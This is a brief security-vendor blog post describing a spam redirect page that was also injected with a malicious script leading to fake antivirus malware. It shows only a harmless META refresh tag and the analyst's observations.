Who's the quickest? Only one way to find out...

Filed Under: SophosLabs

Earlier on this morning I happened to notice a redirect page used in a meds spam campaign that just happened to also be compromised with a malicious script.

You can see the META tag redirect that will instruct the browser to immediately load the page on the target site.

<META HTTP-EQUIV=REFRESH CONTENT="0; URL=http://[target_site]/">

And immediately below, it, the obfuscated JavaScript injected into the page. Deobfuscating this script, we can see its payload is also redirection, this time to a malware site.

Curiosity got the better of me. Which payload 'wins' when the browser loads the page? The META redirect or the JavaScript? Only one way to find out...

Ok, not quite Harry Hill, but I loaded the page with Internet Explorer on a test machine to find out. It appears that the malicious script has precedence over the META redirect, and the iframe payload was delivered. Unfortunately, not a happy ending - infection with rogue security software, pro-actively detected by Sophos as Mal/FakeAV-AD.

Definitely one scenario where you would have been better off with our Canadian Health friends at the end of the META redirect.


You might like

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s